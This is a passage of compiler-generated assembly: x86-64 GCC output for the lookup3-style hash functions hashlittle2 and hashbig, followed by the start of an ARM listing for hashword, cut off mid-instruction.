rax, 8 mov eax, DWORD PTR [rax] and eax, 16777215 add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L96 .L84: mov rax, QWORD PTR -32[rbp] add rax, 8 mov eax, DWORD PTR [rax] movzx eax, ax add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L96 .L85: mov rax, QWORD PTR -32[rbp] add rax, 8 mov eax, DWORD PTR [rax] movzx eax, al add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L96 .L86: mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L96 .L87: mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] and eax, 16777215 add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L96 .L88: mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] movzx eax, ax add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L96 .L89: mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] movzx eax, al add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L96 .L90: mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L96 .L91: mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] and eax, 16777215 add DWORD PTR -52[rbp], eax jmp .L96 .L92: mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] movzx eax, ax add DWORD PTR -52[rbp], eax jmp .L96 .L93: mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] movzx eax, al add DWORD PTR -52[rbp], eax jmp .L96 .L94: mov rax, QWORD PTR -88[rbp] mov edx, DWORD PTR -44[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -96[rbp] mov edx, DWORD PTR -48[rbp] mov DWORD PTR [rax], edx jmp .L76 .L77: mov rax, QWORD PTR -40[rbp] and eax, 1 test rax, rax jne .L97 mov rax, QWORD PTR -72[rbp] mov QWORD PTR -24[rbp], rax jmp .L98 .L99: mov rax, QWORD PTR -24[rbp] movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 2 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -52[rbp], eax mov rax, QWORD PTR -24[rbp] add rax, 4 movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 6 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -24[rbp] add rax, 8 movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 10 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -44[rbp] sub DWORD PTR -52[rbp], eax mov eax, DWORD PTR -44[rbp] rol eax, 4 xor DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] sub DWORD PTR -48[rbp], eax mov eax, DWORD PTR -52[rbp] rol eax, 6 xor DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] add DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] rol eax, 8 xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] add DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] sub DWORD PTR -52[rbp], eax mov eax, DWORD PTR -44[rbp] rol eax, 16 xor DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] sub DWORD PTR -48[rbp], eax mov eax, DWORD PTR -52[rbp] ror eax, 13 xor DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] add DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] rol eax, 4 xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] add DWORD PTR -48[rbp], eax sub QWORD PTR -80[rbp], 12 add QWORD PTR -24[rbp], 12 .L98: cmp QWORD PTR -80[rbp], 12 ja .L99 mov rax, QWORD PTR -24[rbp] mov QWORD PTR -8[rbp], rax cmp QWORD PTR -80[rbp], 12 ja .L96 mov rax, QWORD PTR -80[rbp] lea rdx, 0[0+rax*4] lea rax, .L102[rip] mov eax, DWORD PTR [rdx+rax] cdqe lea rdx, .L102[rip] add rax, rdx notrack jmp rax .section .rodata .align 4 .align 4 .L102: .long .L114-.L102 .long .L113-.L102 .long .L112-.L102 .long .L111-.L102 .long .L110-.L102 .long .L109-.L102 .long .L108-.L102 .long .L107-.L102 .long .L106-.L102 .long .L105-.L102 .long .L104-.L102 .long .L103-.L102 .long .L101-.L102 .text .L101: mov rax, QWORD PTR -24[rbp] add rax, 8 movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 10 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -24[rbp] add rax, 4 movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 6 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -24[rbp] movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 2 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -52[rbp], eax jmp .L96 .L103: mov rax, QWORD PTR -8[rbp] add rax, 10 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -44[rbp], eax .L104: mov rax, QWORD PTR -24[rbp] add rax, 8 movzx eax, WORD PTR [rax] movzx eax, ax add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -24[rbp] add rax, 4 movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 6 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -24[rbp] movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 2 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -52[rbp], eax jmp .L96 .L105: mov rax, QWORD PTR -8[rbp] add rax, 8 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -44[rbp], eax .L106: mov rax, QWORD PTR -24[rbp] add rax, 4 movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 6 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -24[rbp] movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 2 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -52[rbp], eax jmp .L96 .L107: mov rax, QWORD PTR -8[rbp] add rax, 6 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -48[rbp], eax .L108: mov rax, QWORD PTR -24[rbp] add rax, 4 movzx eax, WORD PTR [rax] movzx eax, ax add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -24[rbp] movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 2 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -52[rbp], eax jmp .L96 .L109: mov rax, QWORD PTR -8[rbp] add rax, 4 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -48[rbp], eax .L110: mov rax, QWORD PTR -24[rbp] movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 2 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -52[rbp], eax jmp .L96 .L111: mov rax, QWORD PTR -8[rbp] add rax, 2 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -52[rbp], eax .L112: mov rax, QWORD PTR -24[rbp] movzx eax, WORD PTR [rax] movzx eax, ax add DWORD PTR -52[rbp], eax jmp .L96 .L113: mov rax, QWORD PTR -8[rbp] movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -52[rbp], eax jmp .L96 .L114: mov rax, QWORD PTR -88[rbp] mov edx, DWORD PTR -44[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -96[rbp] mov edx, DWORD PTR -48[rbp] mov DWORD PTR [rax], edx jmp .L76 .L97: mov rax, QWORD PTR -72[rbp] mov QWORD PTR -16[rbp], rax jmp .L115 .L116: mov rax, QWORD PTR -16[rbp] movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -52[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 1 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -52[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 2 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -52[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 3 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -52[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 4 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 5 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 6 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 7 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 8 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 9 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 10 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 11 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -44[rbp] sub DWORD PTR -52[rbp], eax mov eax, DWORD PTR -44[rbp] rol eax, 4 xor DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] sub DWORD PTR -48[rbp], eax mov eax, DWORD PTR -52[rbp] rol eax, 6 xor DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] add DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] rol eax, 8 xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] add DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] sub DWORD PTR -52[rbp], eax mov eax, DWORD PTR -44[rbp] rol eax, 16 xor DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] sub DWORD PTR -48[rbp], eax mov eax, DWORD PTR -52[rbp] ror eax, 13 xor DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] add DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] rol eax, 4 xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] add DWORD PTR -48[rbp], eax sub QWORD PTR -80[rbp], 12 add QWORD PTR -16[rbp], 12 .L115: cmp QWORD PTR -80[rbp], 12 ja .L116 cmp QWORD PTR -80[rbp], 12 ja .L96 mov rax, QWORD PTR -80[rbp] lea rdx, 0[0+rax*4] lea rax, .L118[rip] mov eax, DWORD PTR [rdx+rax] cdqe lea rdx, .L118[rip] add rax, rdx notrack jmp rax .section .rodata .align 4 .align 4 .L118: .long .L130-.L118 .long .L129-.L118 .long .L128-.L118 .long .L127-.L118 .long .L126-.L118 .long .L125-.L118 .long .L124-.L118 .long .L123-.L118 .long .L122-.L118 .long .L121-.L118 .long .L120-.L118 .long .L119-.L118 .long .L117-.L118 .text .L117: mov rax, QWORD PTR -16[rbp] add rax, 11 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -44[rbp], eax .L119: mov rax, QWORD PTR -16[rbp] add rax, 10 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -44[rbp], eax .L120: mov rax, QWORD PTR -16[rbp] add rax, 9 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -44[rbp], eax .L121: mov rax, QWORD PTR -16[rbp] add rax, 8 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -44[rbp], eax .L122: mov rax, QWORD PTR -16[rbp] add rax, 7 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -48[rbp], eax .L123: mov rax, QWORD PTR -16[rbp] add rax, 6 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -48[rbp], eax .L124: mov rax, QWORD PTR -16[rbp] add rax, 5 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -48[rbp], eax .L125: mov rax, QWORD PTR -16[rbp] add rax, 4 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -48[rbp], eax .L126: mov rax, QWORD PTR -16[rbp] add rax, 3 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -52[rbp], eax .L127: mov rax, QWORD PTR -16[rbp] add rax, 2 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -52[rbp], eax .L128: mov rax, QWORD PTR -16[rbp] add rax, 1 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -52[rbp], eax .L129: mov rax, QWORD PTR -16[rbp] movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -52[rbp], eax jmp .L96 .L130: mov rax, QWORD PTR -88[rbp] mov edx, DWORD PTR -44[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -96[rbp] mov edx, DWORD PTR -48[rbp] mov DWORD PTR [rax], edx jmp .L76 .L96: mov eax, DWORD PTR -48[rbp] xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] rol eax, 14 sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -44[rbp] xor DWORD PTR -52[rbp], eax mov eax, DWORD PTR -44[rbp] rol eax, 11 sub DWORD PTR -52[rbp], eax mov eax, DWORD PTR -52[rbp] xor DWORD PTR -48[rbp], eax mov eax, DWORD PTR -52[rbp] ror eax, 7 sub DWORD PTR -48[rbp], eax mov eax, DWORD PTR -48[rbp] xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] rol eax, 16 sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -44[rbp] xor DWORD PTR -52[rbp], eax mov eax, DWORD PTR -44[rbp] rol eax, 4 sub DWORD PTR -52[rbp], eax mov eax, DWORD PTR -52[rbp] xor DWORD PTR -48[rbp], eax mov eax, DWORD PTR -52[rbp] rol eax, 14 sub DWORD PTR -48[rbp], eax mov eax, DWORD PTR -48[rbp] xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] ror eax, 8 sub DWORD PTR -44[rbp], eax mov rax, QWORD PTR -88[rbp] mov edx, DWORD PTR -44[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -96[rbp] mov edx, DWORD PTR -48[rbp] mov DWORD PTR [rax], edx .L76: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE9: .size hashlittle2, .-hashlittle2 .globl hashbig .type hashbig, @function hashbig: .LFB10: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -40[rbp], rdi mov QWORD PTR -48[rbp], rsi mov DWORD PTR -52[rbp], edx mov rax, QWORD PTR -48[rbp] mov edx, eax mov eax, DWORD PTR -52[rbp] add eax, edx sub eax, 559038737 mov DWORD PTR -20[rbp], eax mov eax, DWORD PTR -20[rbp] mov DWORD PTR -28[rbp], eax mov eax, DWORD PTR -28[rbp] mov DWORD PTR -24[rbp], eax mov rax, QWORD PTR -40[rbp] mov QWORD PTR -16[rbp], rax mov rax, QWORD PTR -40[rbp] mov QWORD PTR -8[rbp], rax jmp .L133 .L134: mov rax, QWORD PTR -8[rbp] movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -24[rbp], eax mov rax, QWORD PTR -8[rbp] add rax, 1 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -24[rbp], eax mov rax, QWORD PTR -8[rbp] add rax, 2 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -24[rbp], eax mov rax, QWORD PTR -8[rbp] add rax, 3 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -24[rbp], eax mov rax, QWORD PTR -8[rbp] add rax, 4 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -28[rbp], eax mov rax, QWORD PTR -8[rbp] add rax, 5 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -28[rbp], eax mov rax, QWORD PTR -8[rbp] add rax, 6 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -28[rbp], eax mov rax, QWORD PTR -8[rbp] add rax, 7 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -28[rbp], eax mov rax, QWORD PTR -8[rbp] add rax, 8 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -20[rbp], eax mov rax, QWORD PTR -8[rbp] add rax, 9 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -20[rbp], eax mov rax, QWORD PTR -8[rbp] add rax, 10 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -20[rbp], eax mov rax, QWORD PTR -8[rbp] add rax, 11 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -20[rbp], eax mov eax, DWORD PTR -20[rbp] sub DWORD PTR -24[rbp], eax mov eax, DWORD PTR -20[rbp] rol eax, 4 xor DWORD PTR -24[rbp], eax mov eax, DWORD PTR -28[rbp] add DWORD PTR -20[rbp], eax mov eax, DWORD PTR -24[rbp] sub DWORD PTR -28[rbp], eax mov eax, DWORD PTR -24[rbp] rol eax, 6 xor DWORD PTR -28[rbp], eax mov eax, DWORD PTR -20[rbp] add DWORD PTR -24[rbp], eax mov eax, DWORD PTR -28[rbp] sub DWORD PTR -20[rbp], eax mov eax, DWORD PTR -28[rbp] rol eax, 8 xor DWORD PTR -20[rbp], eax mov eax, DWORD PTR -24[rbp] add DWORD PTR -28[rbp], eax mov eax, DWORD PTR -20[rbp] sub DWORD PTR -24[rbp], eax mov eax, DWORD PTR -20[rbp] rol eax, 16 xor DWORD PTR -24[rbp], eax mov eax, DWORD PTR -28[rbp] add DWORD PTR -20[rbp], eax mov eax, DWORD PTR -24[rbp] sub DWORD PTR -28[rbp], eax mov eax, DWORD PTR -24[rbp] ror eax, 13 xor DWORD PTR -28[rbp], eax mov eax, DWORD PTR -20[rbp] add DWORD PTR -24[rbp], eax mov eax, DWORD PTR -28[rbp] sub DWORD PTR -20[rbp], eax mov eax, DWORD PTR -28[rbp] rol eax, 4 xor DWORD PTR -20[rbp], eax mov eax, DWORD PTR -24[rbp] add DWORD PTR -28[rbp], eax sub QWORD PTR -48[rbp], 12 add QWORD PTR -8[rbp], 12 .L133: cmp QWORD PTR -48[rbp], 12 ja .L134 cmp QWORD PTR -48[rbp], 12 ja .L135 mov rax, QWORD PTR -48[rbp] lea rdx, 0[0+rax*4] lea rax, .L137[rip] mov eax, DWORD PTR [rdx+rax] cdqe lea rdx, .L137[rip] add rax, rdx notrack jmp rax .section .rodata .align 4 .align 4 .L137: .long .L149-.L137 .long .L148-.L137 .long .L147-.L137 .long .L146-.L137 .long .L145-.L137 .long .L144-.L137 .long .L143-.L137 .long .L142-.L137 .long .L141-.L137 .long .L140-.L137 .long .L139-.L137 .long .L138-.L137 .long .L136-.L137 .text .L136: mov rax, QWORD PTR -8[rbp] add rax, 11 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -20[rbp], eax .L138: mov rax, QWORD PTR -8[rbp] add rax, 10 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -20[rbp], eax .L139: mov rax, QWORD PTR -8[rbp] add rax, 9 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -20[rbp], eax .L140: mov rax, QWORD PTR -8[rbp] add rax, 8 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -20[rbp], eax .L141: mov rax, QWORD PTR -8[rbp] add rax, 7 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -28[rbp], eax .L142: mov rax, QWORD PTR -8[rbp] add rax, 6 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -28[rbp], eax .L143: mov rax, QWORD PTR -8[rbp] add rax, 5 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -28[rbp], eax .L144: mov rax, QWORD PTR -8[rbp] add rax, 4 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -28[rbp], eax .L145: mov rax, QWORD PTR -8[rbp] add rax, 3 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -24[rbp], eax .L146: mov rax, QWORD PTR -8[rbp] add rax, 2 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -24[rbp], eax .L147: mov rax, QWORD PTR -8[rbp] add rax, 1 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -24[rbp], eax .L148: mov rax, QWORD PTR -8[rbp] movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -24[rbp], eax jmp .L135 .L149: mov eax, DWORD PTR -20[rbp] jmp .L151 .L135: mov eax, DWORD PTR -28[rbp] xor DWORD PTR -20[rbp], eax mov eax, DWORD PTR -28[rbp] rol eax, 14 sub DWORD PTR -20[rbp], eax mov eax, DWORD PTR -20[rbp] xor DWORD PTR -24[rbp], eax mov eax, DWORD PTR -20[rbp] rol eax, 11 sub DWORD PTR -24[rbp], eax mov eax, DWORD PTR -24[rbp] xor DWORD PTR -28[rbp], eax mov eax, DWORD PTR -24[rbp] ror eax, 7 sub DWORD PTR -28[rbp], eax mov eax, DWORD PTR -28[rbp] xor DWORD PTR -20[rbp], eax mov eax, DWORD PTR -28[rbp] rol eax, 16 sub DWORD PTR -20[rbp], eax mov eax, DWORD PTR -20[rbp] xor DWORD PTR -24[rbp], eax mov eax, DWORD PTR -20[rbp] rol eax, 4 sub DWORD PTR -24[rbp], eax mov eax, DWORD PTR -24[rbp] xor DWORD PTR -28[rbp], eax mov eax, DWORD PTR -24[rbp] rol eax, 14 sub DWORD PTR -28[rbp], eax mov eax, DWORD PTR -28[rbp] xor DWORD PTR -20[rbp], eax mov eax, DWORD PTR -28[rbp] ror eax, 8 sub DWORD PTR -20[rbp], eax mov eax, DWORD PTR -20[rbp] .L151: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE10: .size hashbig, .-hashbig .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "221177.c" .text .align 2 .global hashword .syntax unified .arm .fpu softvfp .type hashword, %function hashword: @ args = 0, pretend = 0, frame = 32 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #36 str r0, [fp, #-24] str r1, [fp, #-28] str r2, [fp, #-32] ldr r3, [fp, #-28] lsl r2, r3, #2 ldr r3, [fp, #-32] add r2, r2, r3 ldr r3, .L11 add r3, r2, r3 str r3, [fp, #-8] ldr r3, [fp, #-8] str r3, [fp, #-12] ldr r3, [fp, #-12] str r3, [fp, #-16] b .L2 .L3: ldr r3, [fp, #-24] ldr r3, [r3] ldr r2, [fp, #-16] add r3, r2, r3 str r3, [fp, #-16] ldr r3, [fp, #-24] add r3, r3, #4 ldr r3, [r3] ldr r2, [fp, #-12] add r3, r2, r3 str r3, [fp, #-12] ldr r3, [fp, #-24] add r3, r3, #8 ldr r3, [r3] ldr r2, [fp, #-8] add r3, r2, r3 str r3, [fp, #-8] ldr r2, [fp, #-16] ldr r3, [fp, #-8] sub r3, r2, r3 str r3, [fp, #-16] ldr r3, [fp, #-8] ror r3, r3, #28 ldr r2, [fp, #-16] eor r3, r3, r2 str r3, [fp, #-16] ldr r2, [fp, #-8] ldr r3, [fp, #-12] add r3, r2, r3 str r3, [fp, #-8] ldr r2, [fp, #-12] ldr r3, [fp, #-16] sub r3, r2, r3 str r3, [fp, #-12] ldr r3, [fp, #-16] ror r3, r3, #26 ldr r2, [fp, #-12] eor r3, r3, r2 str r3, [fp, #-12] ldr r2, [fp, #-16] ldr r3, [fp, #-8] add r3, r2, r3 str r3, [fp, #-16] ldr r2, [fp, #-8] ldr r3, [fp, #-12] sub r3, r2, r3 str r3, [fp, #-8] ldr r3, [fp, #-12] ror r3, r3, #24 ldr r2, [fp, #-8] eor r3, r3, r2 str r3, [fp, #-8] ldr r2, [fp, #-12] ldr r3, [fp, #-16] add r3, r2, r3 str r3, [fp, #-12] ldr r2, [fp, #-16] ldr r3, [fp, #-8] sub r3, r2, r3 str r3, [fp, #-16] ldr r3, [fp, #-8] ror r3, r3, #16 ldr r2, [fp, #-16] eor r3, r3, r2 str r3, [fp, #-16] ldr r2, [fp, #-8] ldr r3, [fp, #-12] add r3, r2, r3 str r3, [fp, #-8] ldr r2, [fp, #-12] ldr r3, [fp, #-16] sub r3, r2, r3 str r3, [fp, #-12] ldr r3, [fp, #-16] ror r3, r3, #13 ldr r2, [fp, #-12] eor r3, r3, r2 str r3, [fp, #-12] ldr r2, [fp, #-16] ldr r3, [fp, #-8] add r3, r2, r3 str r3, [fp, #-16] ldr r2, [fp, #-8] ldr r3, [fp, #-12] sub r3, r2, r3 str r3, [fp, #-8] ldr r3, [fp, #-12] ror r3, r3, #28 ldr r2, [fp, #-8] eor r3, r3, r2 str r3, [fp, #-8] ldr r2, [fp, #-12] ldr r3, [fp, #-16] add r3, r2, r3 str r3, [fp, #-12] ldr r3, [fp, #-28] sub r3, r3, #3 str r3, [fp, #-28] ldr r3, [fp, #-24] add r3, r3, #12 str r3, [fp, #-24] .L2: ldr r3, [fp, #-28] cmp r3, #3 bhi .L3 ldr r3, [fp, #-28] cmp r3, #3 ldrls pc, [pc, r3, asl #2] b .L4 .L6: .word .L4 .word .L8 .word .L7 .word .L5 .L5: ldr r3, [fp, #-24] add r3, r3, #8 ldr r3, [r3] ldr r2, [fp, #-8] add r3, r2, r3 str r3, [fp, #-8] .L7: ldr r3, [fp, #-24] add r3, r3, #4 ldr r3, [r3] ldr r2, [fp, #-12] add r3, r2, r3 str r3, [fp, #-12] .L8: ldr r3, [fp, #-24] ldr r3, [r3] ldr r2, [fp, #-16] add r3, r2, r3 str r3, [fp, #-16] ldr r2, [fp, #-8] ldr r3, [fp, #-12] eor r3, r3, r2 str r3, [fp, #-8] ldr r3, [fp, #-12] ror r3, r3, #18 ldr r2, [fp, #-8] sub r3, r2, r3 str r3, [fp, #-8] ldr r2, [fp, #-16] ldr r3, [fp, #-8] eor r3, r3, r2 str r3, [fp, 